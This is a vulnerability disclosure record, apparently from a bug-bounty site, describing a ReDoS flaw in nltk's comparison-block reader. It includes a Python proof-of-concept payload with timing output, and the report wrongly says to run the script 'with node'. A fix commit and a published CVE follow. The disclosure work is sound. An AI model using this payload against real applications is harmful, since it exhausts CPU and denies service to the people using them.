Inefficient Regular Expression Complexity in nltk/nltk


Reported on

Sep 19th 2021

✍️ Description

The nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide as an input to the _read_comparison_block() function in the file "nltk/corpus/reader/" may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

Put the below in a file and run with node

import time
import re

evil_regex = re.compile(r"\((?!.*\()(.*)\)$")

for i in range(1, 50000):
    start_time = time.perf_counter()
    payload = "( "+"("*(i*40000)+""
    re.findall(evil_regex, payload)
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")

Check the Output:

Payload.length: 40002: 0.2007029 ms
Payload.length: 80002: 0.8401304 ms
Payload.length: 120002: 1.8615463 ms
Payload.length: 160002: 3.2876105 ms
We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the nltk team and are waiting to hear back 2 years ago
nltk/nltk maintainer validated this vulnerability 2 years ago
srikanthprathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
nltk/nltk maintainer
2 years ago


A patch has been developed, and is awaiting approval from the rest of the team: Thank you for disclosing this issue with us.

nltk/nltk maintainer marked this as fixed with commit 277711 2 years ago
The fix bounty has been dropped
Jamie Slome
2 years ago

CVE published! 🎊

to join this conversation